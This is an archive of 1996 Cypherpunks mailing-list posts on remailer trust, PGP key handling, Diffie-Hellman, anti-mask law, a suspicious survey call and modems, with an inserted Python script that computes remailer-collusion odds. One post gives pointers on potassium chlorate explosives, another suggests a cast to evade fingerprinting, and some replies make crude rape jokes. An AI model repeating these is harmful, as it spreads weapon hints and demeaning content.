-Heinrich Heine People and books aren't for burning. No more Alexandrias, Auschwitzs or Wacos. From dougr at skypoint-gw.globelle.com Thu Sep 19 20:07:28 1996 From: dougr at skypoint-gw.globelle.com (Douglas B. Renner) Date: Fri, 20 Sep 1996 11:07:28 +0800 Subject: Morality, Responsibility, Technology. In-Reply-To: <199609191327.XAA00418@suburbia.net> Message-ID: >> The term "defect" is therefore entirely out of line. We have no business >> placing judgements from our own limited material value sets onto >> something which has the definite potential of affecting all future >> generations of Humanity. It's none of our business. > >The problem however, is that artificial selection maybe the only way to >select beneficial attributes at all. What is presently being selected >for in western societies is all the factors that lead to a lack of >practice or belief in birth control. I'll let the reader think for a >moment on just what those are. Perhaps we can also somehow test for and >abolish the "Catholic" gene? You offer the humorous example of Catholicism. But this is really a deceptively clear example of exactly what I was saying: that we aren't even close to having any kind of objective faculties which would be required to competently make these kinds of decisions. Catholicism: is it Nature or is it Nurture? This example would effectively equivalent to just one ideology gaining "leverage" over another, and using the technology of genetics to gain this leverage. I'll finish this up below. I don't want to miss your real counterpoint behind the example. What I hear you really saying is that you can open your eyes, and look around at the processes of natural selection in action, and you can see all kinds of social forces at work, many of which would appear, given our value set, to be functioning to the disadvantage of the species. But again, this proves even more brutally how deeply our lack of objectivity runs when we try to evaluate such matters. 
We tend to value traits such as industriousness, and yet we see some social welfare programs which effectively reward the absence of this quality. This example, as well as your own example, are issues which we can't even reach a consensus on socially. And since *we* can't even deal with such things socially, how could we ever presume to claim the moral competence to address them genetically? For example, our western society is less than 9,000 years old. As participants we assume our western society is "good." But a traditional Australian Aborigine, coming from a 35,000 to 60,000 year old society, might have a completely different perspective. He might view our European lifestyle as one very big mistake, and a recent one at that. Maybe, just maybe, we have culturally taken a very large step away from what our inherent natures really are. If this were true you might expect to see a larger amount of latent grey matter evolved into all of our skulls than any of us really use. But then, this *is* the case. So as we are, nobody really knows what the effect of widespread crypto will be, any more than we could have predicted the impact of cars or transistors or nuclear fission. The future is literally in your hands. Douglas B. Renner dougr at usa.globelle.com From alano at teleport.com Thu Sep 19 20:15:52 1996 From: alano at teleport.com (Alan Olsen) Date: Fri, 20 Sep 1996 11:15:52 +0800 Subject: [Noise] Do unto others... Message-ID: <3.0b16.32.19960919171257.00ca49e8@mail.teleport.com> At 05:26 AM 9/19/96 +0000, attila wrote: >Mike Farrell, actor and longtime opponent of the death penalty: > > "We don't rape rapists, > we don't burn arsonists, > why should we kill killers?" > > well, come to thing of it, why don't we let a bull rape a rapist? > > or burn an arsonist at the stake? > > seems fair to me. maybe even sell tickets to pay for the cost. I guess that begs the question of what to do with politicians... "Squeal like a pig! Squeal! Squeal!" 
"There will be no crisco today!" - Caligula --- | "Remember: You can't have BSDM without BSD." - alan at ctrl-alt-del.com | |"The moral PGP Diffie taught Zimmermann unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | |`finger -l alano at teleport.com` for PGP 2.6.2 key | behind the keyboard.| | http://www.teleport.com/~alano/ | alano at teleport.com | From alano at teleport.com Thu Sep 19 20:25:06 1996 From: alano at teleport.com (Alan Olsen) Date: Fri, 20 Sep 1996 11:25:06 +0800 Subject: unimbibe cypherpunks@toad.com Message-ID: <3.0b16.32.19960919181104.00ca68d8@mail.teleport.com> At 05:37 PM 9/19/96 -0700, you wrote: >I tried "unscrive," "unsuscrive," and "unscribe," and even "unsuckscribe," >so now I'm trying "unimbibe." Try sending mail to: drummajor at toad.com with uncircumcise cypherpunks in the body of the message. --- | "Remember: You can't have BSDM without BSD." - alan at ctrl-alt-del.com | |"The moral PGP Diffie taught Zimmermann unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | |`finger -l alano at teleport.com` for PGP 2.6.2 key | behind the keyboard.| | http://www.teleport.com/~alano/ | alano at teleport.com | From asgaard at Cor.sos.sll.se Thu Sep 19 20:25:09 1996 From: asgaard at Cor.sos.sll.se (Asgaard) Date: Fri, 20 Sep 1996 11:25:09 +0800 Subject: More proposals for European censorship In-Reply-To: <01I9O2D1BGCO8Y4ZFQ@mbcl.rutgers.edu> Message-ID: On Thu, 19 Sep 1996, E. Allen Smith forwarded: >> STRASBOURG, France (Sep 19, 1996 11:24 a.m. EDT) - The European >> Parliament pressed the European Union on Thursday to act to curb child >> sex and trafficking rings, saying the fight against sexual abuse of >> children must be an "absolute priority." 
It's probably no coincidence that the recently busted, utter horrible child-molesting ring, with obvious protection from various persons in the establishment, was centered in Belgium - that's where the EU bureaucrat nomenklatura play their power games and go to bordellos. Asgaard From westo at bssc.edu.au Thu Sep 19 21:03:58 1996 From: westo at bssc.edu.au (barina man) Date: Fri, 20 Sep 1996 12:03:58 +0800 Subject: Insider Trading - news report Message-ID: <1.5.4.32.19960920013701.0067f4e4@172.24.10.10> >Return-Path: cypherpunks-errors at toad.com >Date: Thu, 19 Sep 1996 15:46 EDT >From: "E. Allen Smith" >Subject: Insider Trading - news report >To: cypherpunks at toad.com >X-Envelope-to: cypherpunks at toad.com >X-VMS-To: IN%"cypherpunks at toad.com" >Sender: owner-cypherpunks at toad.com > > I'd be curious as to the comments of Black Unicorn and others on >that legal finding - it does appear to make things at least a bit better >in this area... including making it difficult to claim that insider >information shouldn't be transmitted on the Net. Incidentally, I find >AP's calling insider trading "fraud" rather biased. > -Allen > >> _________________________________________________________________ >> Direct Media >> _________________________________________________________________ >> INSIDER TRADING NEVER WENT AWAY >> __________________________________________________________________________ >> Copyright © 1996 Nando.net >> Copyright © 1996 The Associated Press > >> WASHINGTON (Sep 18, 1996 10:35 a.m. EDT) -- One of the most infamous >> acts in the financial fraudster's playbook, insider trading, remains >> at record levels, despite a decade of steady crackdowns by regulators. > >[...] > >> The SEC brought one of its more unusual insider trading cases on >> Monday, when it sued the unnamed account holders in a Swiss and >> Bahamian accounts with insider trading ahead of The Gillette Co.'s >> merger proposal for Duracell International. > >[...] 
> >> One disturbing development for regulators is a recent decision by the >> 8th U.S. Circuit Court of Appeals that struck down one of the SEC's >> main enforcement tools in insider trading cases. > >> The court, which covers several Midwestern states, rejected the >> so-called "misappropriation theory" in insider trading cases, which is >> used to nab people trading on inside information who don't owe a >> fiduciary duty to the company's shareholders. The court also rejected >> an SEC rule used to snare insider trading in tender offers. > >> The 8th Circuit decision came in August in a Justice Department case >> against Minneapolis attorney James H. O'Hagan, who was charged with >> insider trading during the 1988 takeover bid of Pillsbury Co. by Grand >> Metropolitan PLC. SEC General Counsel Richard Walker has asked the >> appeals court for a rehearing on the matter. > >> While the 8th Circuit decision represents a setback for the SEC, the >> agency usually brings its cases in the New York and Chicago areas, >> where the federal courts acknowledge these insider trading rules. > >> Regulators say these enforcement tools are important because insider >> trading follows few patterns. In an analysis of 35 cases brought in >> 1995 that solely dealt with insider trading, Gerlach said 20 involved >> trading ahead of mergers, three ahead of other positive corporate >> announcements and six ahead of bad corporate news. > >> He described 16 of the cases as "classic insider trading" involving an >> executive, company director or employee who traded on confidential, >> market sensitive information or tipped friends about it. Among the >> remaining cases, four involved trading by securities brokers or other >> industry officials, four involved law firm employees and one, an >> employee at an outside accounting firm. > >> Investigators at the Nasdaq Stock Market's market surveillance unit >> refer a significant number of insider trading cases to the SEC. 
Halley >> Milligan, who heads a team of nine insider trading investigators at >> Nasdaq, said the market has made 73 referrals on suspected insider >> trading to the SEC so far in 1996, which is on par with last year, >> when 107 cases were referred to the agency. > >> Nasdaq, like major stock markets, uses sophisticated computer >> technology to sniff out illegal trading. The Nasdaq system is called >> SWAT, or Stock Watch Automatic Tracking, which scans news databases >> after detecting any unusual trading. > >[...] > >> Copyright © 1996 Nando.net > >unsubscribe please

From nobody at cypherpunks.ca Thu Sep 19 21:12:50 1996
From: nobody at cypherpunks.ca (John Anonymous MacDonald)
Date: Fri, 20 Sep 1996 12:12:50 +0800
Subject: DL in exchange for fingerprint
In-Reply-To:
Message-ID: <199609200149.SAA23613@abraham.cs.berkeley.edu>

tcmay at got.net (Timothy C. May) writes:
> So, just what it is _your_ method of dealing with this? While it is noble
> to talk about fighting the system, just how do you go about doing it
> yourself?

How about just putting your finger in a cast or splint before you renew your license?

From DMiskell at envirolink.org Thu Sep 19 21:57:20 1996
From: DMiskell at envirolink.org (Daniel Miskell)
Date: Fri, 20 Sep 1996 12:57:20 +0800
Subject: All Bets Off
Message-ID: <199609200230.WAA05165@envirolink.org>

I don't doubt this, honestly. After all, novels alone don't earn the kind of guided tours, information, and assistance he's received on many counts. It had the feel of military connections, but I wasn't about to doubt it, I've always this truly was the Land Of Opportunity. In any event, he deserves such treatment. He's an excellent author, and does justice to the people he portrays, despite the disclaimer that none of the characters are made to represent anyone living or dead.

Daniel.
From dthorn at gte.net Thu Sep 19 22:52:35 1996 From: dthorn at gte.net (Dale Thorn) Date: Fri, 20 Sep 1996 13:52:35 +0800 Subject: Stego inside encryption In-Reply-To: Message-ID: <32421412.2C7C@gte.net> Mullen Patrick wrote: > To take this one step further, has anyone tried to ever use this > method as an encryption method? You could hide data in a stream of > random bits, using position as the encryption method. Obviously, the > data would not be stored in packets; rather as single bits strewn > throughout the stream. Even ASCII characters could be hidden in such > a system very well, as the possibility of > choosing the correct 8 bits (extended char set) from the data stream > when any combination has equal potential of being the correct sequence > would be extremely difficult. Error checking/correcting code could > even be used. > Using this system, the placement algorithm would be the focus of > attack. If an algorithm which has a sufficiently random placement was > used, extracting the correct bits would be difficult. Another way to > increase the security would be to hide the correct message inside a > bitstream created by using the same method on other similar messages. > (Hiding a real message inside bogus messages. Hmm...Which one's real?)..... some text deleted here.... This sounds like exactly what I've been saying. You could paste the message inside or adjacent to the non-text data (and you could bit-pad the text before doing so), then move all the bits around, etc. I'm not sure what was meant by "even ASCII characters could be hidden...", since just before you encrypt, everything's ASCII in some sense or another. From froomkin at law.miami.edu Thu Sep 19 23:24:07 1996 From: froomkin at law.miami.edu (Michael Froomkin - U.Miami School of Law) Date: Fri, 20 Sep 1996 14:24:07 +0800 Subject: LEOs running anon servers? In-Reply-To: Message-ID: This claim was made at a symposium held at Harvard by a sometime lecturer at the National Defense college. 
He later denied it. Since lots of other things he said in the same lecture were plainly false (more likely his ignorance than a clever attempt to spread FUD), I wouldn't lose sleep over it. Anyway, who cares -- you just use encryption and chaining and all is well. See http://www.law.miami.edu/~froomkin/articles/oceanno.htm#xtocid583110 for more info. On Tue, 10 Sep 1996, Andrew Fabbro wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > On Mon, 9 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > > > There > > are a number of anonymous remailers out in cyberspace, but it has been > > stated by a knowledgeable source that a number of them are being operated > > by law enforcement agencies (presumably to troll for criminal activity). A > > > Can someone verify/discredit/comment on this statement? Who is the > knowledgeable source? > > > > > Andrew Fabbro [afabbro at umich.edu] http://www-personal.umich.edu/~afabbro/ > PGP mail preferred; finger afabbro at us.itd.umich.edu for key > "A good marketing organization listens to its customers...WE HEAR YOU!" > - the National Security Agency > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > Comment: PGP Signed with PineSign 2.0 > > iQCVAwUBMjWOx7oWkgjb6N6dAQEK4QP9ETvg03QMpYw81FmXNl0vxbkYLk9wph74 > /291PduW3+BkN17iKBBns6v//HrnZJIttMqG+7wLzrX+zt1OpspGJLjJm03P/m68 > CQ8L2K3stOyYvSB/S63M449eC+QX9iNEFpLD/QNOv7JM4ZVgQvEvUH6STaxF+Ez4 > ClypqKualSA= > =L3rM > -----END PGP SIGNATURE----- > **Benjamin Bradley Froomkin, b. Sept. 13, 1996, 8 lbs 14.5oz 21.5"** A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | U. Miami School of Law | froomkin at law.miami.edu P.O. Box 248087 | http://www.law.miami.edu/~froomkin Coral Gables, FL 33124 USA | It's hot here. And humid. 
From stewarts at ix.netcom.com Thu Sep 19 23:25:02 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 20 Sep 1996 14:25:02 +0800 Subject: Private key server Message-ID: <199609200400.VAA04898@dfw-ix1.ix.netcom.com> At 11:46 AM 9/18/96 -0400, csteel at teir.com (Chris Steel) wrote about the problem of getting his public and private keys to various machines around his company, and would like some sort of secret-key-ring server to make it easier to download them (and presumably to avoid leaving them on the disks of shared machines for longer than necessary.) This is, of course, semi-dangerous, for a couple of reasons 1) Limiting access to your secret keyring file reduces the probability of a brute-force cracker attack against your keyring - if your password is "foo", then anybody who has your keyring can probably find that out quickly if they hack a pgp-keyring-cracker. 2) Your keyring has, in cleartext, the identities of the different keys on it. If you only use one id, and it's well-known, that doesn't expose you particularly, but if you're using multiple nyms, anyone who has your file can connect them by just looking at the printable parts of the file. However, assuming you've decided to do it anyway :-), what are your options? You could use a networked file system such as NFS or Netware or the Evil Microsoft NETBIOS-based filesystems, and take advantage of their protections. Since they don't ship encrypted data, any eavesdropper can find them anyway, but they won't be able to just grab the file off the net. You'd be better off, however, using a secure web server, like Apache-SSL, and only providing https: access to the page plus passwords plus address-based restrictions to try to make it accessible only to you and not eavesdroppable. Also, you can encrypt the copy of the secret keyring you distribute using a secret key you can remember. 
But don't do it :-) # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From froomkin at law.miami.edu Thu Sep 19 23:47:20 1996 From: froomkin at law.miami.edu (Michael Froomkin - U.Miami School of Law) Date: Fri, 20 Sep 1996 14:47:20 +0800 Subject: Fed appellate judge remarks re anonymity In-Reply-To: Message-ID: For a quick survey of anti-mask laws in the U.S. and their mixed reception in the courts see http://www.law.miami.edu/~froomkin/articles/clippern.htm#ToC54 The law is in flux here. On Thu, 12 Sep 1996, Timothy C. May wrote: > At 1:47 AM 9/13/96, Jim Choate wrote: > >Forwarded message: > > > >> Date: Thu, 12 Sep 1996 17:40:19 -0700 > >> From: Greg Broiles > >> > >> The article quotes Kozinski as saying "I have a severe problem with > >> anonymous E-mailers . . . You don't have a right to walk up to somebody's > >> door and knock with a bag over your head." The article says Kozinski likened > >> anonymous E-mail to menacing someone. > > > >I guess the esteemed judge doesn't believe in Halloween.... > **Benjamin Bradley Froomkin, b. Sept. 13, 1996, 8 lbs 14.5oz 21.5"** A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | U. Miami School of Law | froomkin at law.miami.edu P.O. Box 248087 | http://www.law.miami.edu/~froomkin Coral Gables, FL 33124 USA | It's hot here. And humid. From jamesd at echeque.com Fri Sep 20 00:00:00 1996 From: jamesd at echeque.com (James A. Donald) Date: Fri, 20 Sep 1996 15:00:00 +0800 Subject: PGP in the workplace Message-ID: <199609200503.WAA25335@dns1.noc.best.net> At 11:20 PM 9/17/96 -0400, Rick Osborne wrote: > Upon explaining to them that I was simply trying to make sure of my own > security, I was told that I was to just assume that I was secure, and that > *any* 'poking around' was found to be "highly aggravating" and could only > only "exascerbate the situation further.". 
> > Now, seeing as I'm fairly new to the Corporate world, but is this something > common? Not at all common in my experience, though whether this is because most bosses are more enlightened, or because most bosses are pig ignorant about security, I am not sure. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From dlv at bwalk.dm.com Fri Sep 20 00:19:27 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Fri, 20 Sep 1996 15:19:27 +0800 Subject: The periodic caveat about Timmy May In-Reply-To: <199609191920.NAA00823@InfoWest.COM> Message-ID: attila writes: > In <199609190517.HAA00851 at basement.replay.com>, on 09/19/96 > at 07:17 AM, nobody at flame.alias.net (Anonymous) said: > > = .Timmy May habitually digs into his cesspool of a mind for his > = .mailing list fertilizer. > > this is humour. it tickles the imagination, and the reference > to tim is lost! Can we get all this non-crypto-relevant shit off of this mailing list please? --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From kaye at ix.netcom.com Fri Sep 20 00:47:30 1996 From: kaye at ix.netcom.com (Kaye Caldwell) Date: Fri, 20 Sep 1996 15:47:30 +0800 Subject: ** 9/24 Ca. Dig. Sig. Working Group Meeting ** Message-ID: <199609200533.WAA28740@netcom8.netcom.com> Reposted from spki. - Bill -------- Apologies for duplicates - some of you I'm sure are on multiple notice lists for this. 
California Digital Signature Regulations Working Group
sponsored by the Software Industry Coalition and CommerceNet

THIS MEETING IS OPEN TO ANYONE WHO WISHES TO ATTEND
However, please let me know if you will be attending via e-mail to: kaye at ix.netcom.com

WHEN: Tuesday September 24, 1-4 PM
WHERE: Sun Microsystems, 901 San Antonio Rd, (Building PAL-1) (corner of S. A. & Charleston, just off 101), Palo Alto
Cancun Conference Room, 2nd Floor

AGENDA
I. Report on status of Secretary of State's Task Force - request for demos of technology in Sacramento
II. Review of draft of our principle 1, suggestions for additional principles
III. Review of current draft of outline of regulations
IV. Review of draft Digital Signature Acceptance Procedures background paper
V. Draft language for additional technologies

For more information, e-mail Kaye Caldwell at kaye at ix.netcom.com or call 408-479-8743.

Kaye Caldwell
Software Industry Coalition Policy Director
CommerceNet Advocacy and Public Policy Committee Chair
-------------------------------

From tcmay at got.net Fri Sep 20 01:00:27 1996
From: tcmay at got.net (Timothy C. May)
Date: Fri, 20 Sep 1996 16:00:27 +0800
Subject: LEOs running anon servers?
Message-ID:

At 4:15 AM 9/20/96, "Michael Froomkin - U.Miami School of Law"
>This claim was made at a symposium held at Harvard by a sometime lecturer
>at the National Defense college. He later denied it. Since lots of other
>things he said in the same lecture were plainly false (more likely his
>ignorance than a clever attempt to spread FUD), I wouldn't lose sleep over
>it.
>
>Anyway, who cares -- you just use encryption and chaining and all is well.

The coauthors (the other works for Science Applications) have never supplied evidence for the verbal claim, as Michael notes. From their paper, they seemed ill-informed, and apparently took most of their material from published Web pages (e.g., Raph Levien's).

But I'm not as sanguine about chaining being enough.
Think of it as a "percolation" problem, similar to finding a path through a network.

To make this clear, if there are M remailers and N of them are "colluding" (whether NSA-controlled or working for Burger King), and one chooses O of them for a chain, what are the chances that one is compromised?

To put some numbers on this, if there are 30 remailers and 15 are NSA-owned and one picks 5 remailers in a chain, there's a 3% chance that all the remailers picked are NSA-owned. And so on. A standard probability calculation.

There are nuances to consider. Reputations of remailers (beliefs by others, a la Dempster-Shafer propagation of beliefs). Using one's self as a remailer is always a nice touch. And so on.

I do think there is almost no chance any of the "well-known" remailers are NSA or GCHQ-controlled, but the situation may change as remailers become less well-known and more fluidly instantiated, and as the NSA begins to take more serious notice of remailers than they apparently have so far.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May               | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA   | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From pgf at acadian.net Fri Sep 20 01:18:02 1996
From: pgf at acadian.net (Phil Fraering)
Date: Fri, 20 Sep 1996 16:18:02 +0800
Subject: DL in exchange for fingerprint
In-Reply-To: <199609200149.SAA23613@abraham.cs.berkeley.edu>
Message-ID:

On Thu, 19 Sep 1996, John Anonymous MacDonald wrote:

> tcmay at got.net (Timothy C. May) writes:
> > So, just what it is _your_ method of dealing with this? While it is noble
> > to talk about fighting the system, just how do you go about doing it
> > yourself?
> How about just putting your finger in a cast or splint before you
> renew your license?

Does Nevada have the same rules as California wrt fingerprints for driver's licenses?

(Of course, this concept has been rehashed a hundred times on the list even during that fraction of its existence that I have been here).

Phil Fraering        "And the moral of the story is,
pgf at acadian.net    *never count your boobies until they
318/261-9649          are hatched*."
                      - James Thurber, "The Unicorn in the Garden"

From osborne at gateway.grumman.com Fri Sep 20 01:28:47 1996
From: osborne at gateway.grumman.com (Rick Osborne)
Date: Fri, 20 Sep 1996 16:28:47 +0800
Subject: CNET Digital Dispatch Vol. 2 No. 38
Message-ID: <3.0b19.32.19960920021220.0050fc50@gateway.grumman.com>

This week's c|net digital dispatch had the following top ten list. For number 8, did they mean DES or is the EDS something I'm not aware of. I figure it has to be because what does DES have to do with chat rooms?

>9. TOP TEN REASONS WHY THE PRESIDENTIAL DEBATES WON'T TAKE
>PLACE ON THE WEB
>
>10. Kemp would fight with Dole over who gets to
> "quarterback" the keyboard.
>9. Oops: Gore plugged information superhighway cable
> into White House central vacuum system.
>8. Perot's crack team of EDS hackers would get him
> in somehow.
>7. Hotwired editors say presidential candidates not
> hip enough.
>6. Hillary doesn't let the President in ANY chat rooms.
>5. Debate commission insists: event must be on Prodigy.
>4. Bill Gates owns the rights to online debates.
>3. Dole's Selectric won't connect to the Net.
>2. Chelsea is using the White House PC to write a
> book report.
>1. In cyberspace, no one can feel your pain.

____________________________________________________________
Rick Osborne osborne at gateway.grumman.com
"The universe doesn't give you any points for doing things that are easy."
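
[Added example, not part of any message in this archive.] The chain-compromise estimate in Timothy C. May's "LEOs running anon servers?" message above (M remailers, N colluding, O picked for a chain), worked exactly in Python. It assumes hops are picked uniformly at random and that a chain is traceable only when every hop colludes; the function names are this example's own. For his numbers (30, 15, 5), picking five distinct remailers gives about 2.1%, while the 3% figure corresponds to allowing a remailer to be reused (0.5^5, about 3.1%).

```python
"""Chance that a remailer chain consists only of colluding remailers.

Model (an assumption of this example): the sender picks `chain` remailers
uniformly at random out of `total`, `colluding` of which cooperate with each
other, and the chain is traceable only if every hop colludes.
"""
from fractions import Fraction
from math import comb


def _check(total, colluding, chain):
    if not 0 <= colluding <= total or not 1 <= chain <= total:
        raise ValueError("need 0 <= colluding <= total and 1 <= chain <= total")


def hops_colluding(total, colluding, chain, k):
    """P(exactly k of `chain` distinct hops collude): hypergeometric."""
    _check(total, colluding, chain)
    if not 0 <= k <= chain:
        return Fraction(0)
    # math.comb(n, r) is 0 when r > n, so impossible splits drop out.
    ways = comb(colluding, k) * comb(total - colluding, chain - k)
    return Fraction(ways, comb(total, chain))


def fully_colluding(total, colluding, chain):
    """P(every hop colludes) when the hops are distinct remailers."""
    return hops_colluding(total, colluding, chain, chain)


def fully_colluding_with_reuse(total, colluding, chain):
    """P(every hop colludes) when the same remailer may be picked again."""
    _check(total, colluding, chain)
    return Fraction(colluding, total) ** chain


def at_least_one_colluding(total, colluding, chain):
    """P(one or more hops collude), the weaker event."""
    return 1 - hops_colluding(total, colluding, chain, 0)


def shortest_chain(total, colluding, target):
    """Smallest chain length with P(fully colluding) <= target, else None."""
    for chain in range(1, total + 1):
        if fully_colluding(total, colluding, chain) <= target:
            return chain
    return None  # only when every remailer colludes and target < 1


if __name__ == "__main__":
    M, N = 30, 15  # the numbers used in the message
    print("hops  distinct   with reuse")
    for hops in range(1, 11):
        exact = float(fully_colluding(M, N, hops))
        reuse = float(fully_colluding_with_reuse(M, N, hops))
        print(f"{hops:4d}  {exact:8.4%}  {reuse:8.4%}")
    print("at least one colluding hop in a chain of 5:",
          f"{float(at_least_one_colluding(M, N, 5)):.1%}")
    print("chain length for <= 0.1% fully colluding:",
          shortest_chain(M, N, Fraction(1, 1000)))
```
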

From jamesd at echeque.com Fri Sep 20 01:42:27 1996
From: jamesd at echeque.com (James A. Donald)
Date: Fri, 20 Sep 1996 16:42:27 +0800
Subject: HipCrime as MetaSPAM
Message-ID: <199609200603.XAA01570@dns1.noc.best.net>

At 02:10 AM 9/15/96 -0700, Bill Stewart wrote:
>5) "Anarchist Info" - sigh. Where do people get the idea that publishing
>recipes for drugs and explosives is anarchist info? He didn't talk
>about anarchy, or getting along without governments, or getting rid of them.
>Also, he neglects to note that you can simply _buy_ potassium chlorate,
>rather than having to (dangerously) boil down bleach and potassium chloride

In addition: Potassium chlorate based explosives are not particularly safe or reliable, but worse than that, much worse, because of their relatively slow detonation rate, they are very ineffectual for smashing stuff and killing people,

---------------------------------------------------------------------
                                      |
We have the right to defend ourselves | http://www.jim.com/jamesd/
and our property, because of the kind |
of animals that we are. True law      | James A. Donald
derives from this right, not from the |
arbitrary power of the state.         | jamesd at echeque.com

From robert at precipice.v-site.net Fri Sep 20 01:57:15 1996
From: robert at precipice.v-site.net (HipCrime)
Date: Fri, 20 Sep 1996 16:57:15 +0800
Subject: did you go to school?
In-Reply-To: <199609200537.AAA00264@smoke.suba.com>
Message-ID: <324239A6.163F@precipice.v-site.net>

message returned, then deleted (UNREAD)

--
HTTP://www.HIPCRIME.com

From stewarts at ix.netcom.com Fri Sep 20 02:27:50 1996
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Fri, 20 Sep 1996 17:27:50 +0800
Subject: stealthy key exchange
Message-ID: <199609200649.XAA13400@dfw-ix1.ix.netcom.com>

At 11:37 AM 9/19/96 DST, Bodo_Moeller at public.uni-hamburg.de (Bodo Moeller) wrote:
>If both have public keys, what is the point of using Diffie-Hellman?
>The two channels (Alice -> Bob and Bob -> Alice) are independent, so
>they can use different session keys. Alice creates a random key K_A
>and sends it to Bob (encrypted with Bob's public key). Alice uses K_A

Diffie-Hellman gives you forward security - if an eavesdropper copies your message and later steals your secret keys, he can't decrypt it, because there's no encrypted session key to recover. To prevent man-in-the-middle attacks, sign your half-keys with your public key.

There are some problems with this method - it requires several exchanges, so it's awkward to use for email (though you can do it.) Also, it does expose the signed keyparts, which reveals the public key used for signing, though you can play games to prevent this (e.g. negotiate the key, and send the signed keyparts encrypted with the public key, though if there _is_ a man-in-the-middle, the MITM can see this, and your connection will fail.)

# Thanks; Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
#
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto

From dthorn at gte.net Fri Sep 20 02:50:03 1996
From: dthorn at gte.net (Dale Thorn)
Date: Fri, 20 Sep 1996 17:50:03 +0800
Subject: (fwd) Strange telephone call
In-Reply-To: <199609192333.TAA25736@yakko.cs.wmich.edu>
Message-ID: <32423366.3D24@gte.net>

Damaged Justice wrote:
> Okay, this is the story. I just received a strange telephone call.
> My caller ID system shows only 'OUT_OF_AREA-----000-----'. The female
> voice claimed to be taking a survey for the Department of Defense and
> that she was acting as a representative of my government. She did not
> say US Government or State Government, just 'your government'.
> When I said that there was no way for me to verify she was what she
> claimed, she gave me a business name, supervisor's name and an 800
> telephone number. She claimed this survey had to do with a Department
> of Defense program named 'YATS' and told me that if my household did
> not qualify, then our telephone number would be removed from the
> calling list. She then asked the same question three different ways.
> The question was 'Is there anyone in your household between the ages
> of 16 and 24?'. When I said no for the third time, she said we did
> not qualify and hung up.
> So here are my questions.
> Was this a legitimate call? The government should already know
> exactly how many people are in my household. It is on my tax forms
> every year and many other places.
> Why would any government office or representative of a government
> office be making cold calls to unknown telephone numbers for any kind
> of survey?
> Who or what is 'Westat'? This is the name of the company this woman
> supposedly represented.
> The telephone number given to me is 1-800-638-8778. The same woman
> answered it as called me. Seems like a company doing a survey for the
> government would have more than one employee. Her supervisor's name
> is Chris Martin. Is she Chris Martin? In a single person office, I
> guess you would be your own supervisor. The woman never gave her
> personal name.
> This survey was supposed to be for the Department of Defense for a
> program named 'YATS'. What is YATS?
> My biggest question is, Is this a new face on an old scam? Instead of
> posing as the local fire department looking for donations, are the
> scam-artists now posing as the government? What a way to case a home
> in preparation for theft or running yet another scam of questionable
> legality. Yes, I am a very suspicious person. I have seen too many
> scams being run.

My GTE WATS line for internet is 800-638-xxxx, so maybe they're related.

From tcmay at got.net Fri Sep 20 02:50:15 1996
From: tcmay at got.net (Timothy C. May)
Date: Fri, 20 Sep 1996 17:50:15 +0800
Subject: CNET Digital Dispatch Vol. 2 No. 38
Message-ID:

At 6:12 AM 9/20/96, Rick Osborne wrote:
>This week's c|net digital dispatch had the following top ten list. For
>number 8, did they mean DES or is the EDS something I'm not aware of. I
>figure it has to be because what does DES have to do with chat rooms?

>>8. Perot's crack team of EDS hackers would get him
>> in somehow.

EDS = Electronic Data Systems, the company Perot formed in the 1960s. Acquired by General Motors, then spun off. Perot has not been connected to it for many years.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May               | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA   | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From gnu at toad.com Fri Sep 20 03:48:54 1996
From: gnu at toad.com (John Gilmore)
Date: Fri, 20 Sep 1996 18:48:54 +0800
Subject: 56 kbps modems
Message-ID: <199609200744.AAA07457@toad.com>

I checked the Rockwell home page, which has a pointer to the press release. It isn't very technical, but gives some good clues.

It looks like they're doing an interesting trick. The modems aren't designed for use like traditional modems, where the same equipment is on each end. Instead, there is a digital interface on one side of the phone call (like at an Internet Service Provider). The consumer side modem has a traditional analog interface.

The rest of this is speculation and fantasy on my part.

So, think about it. The analog side will generate voltages and send them to the local central office, where they will be digitized and sent to the destination central office digitally.
There, they will be patched into one channel of a T1 line (out of 24) and sent digitally to the ISP's "modem bank". Equipment is already available (and in use all over the uunet network) that plugs T1 into a board full of digital signal processors, decodes each of the 24 channels (each channel running any modem signalling protocol, or ISDN), handles PPP packet framing, and gateways the resulting packets to/from an Ethernet.

Now for Rockwell's trick, you get the DSP's in the two modems to talk to each other. They can run some simple coding scheme (say ordinary 2400 baud modem for this example) to pass digital data back and forth while they're negotiating the full blown deal.

First, the analog side syncs up with the clock for the 8000 samples/sec that the central office is digitizing (into 8-bit samples). You can do that by sending one voltage and then switching to another; the far side can tell you whether you switched on a sample-boundary or not (was there a sample "in between" before it settled to the new value?).

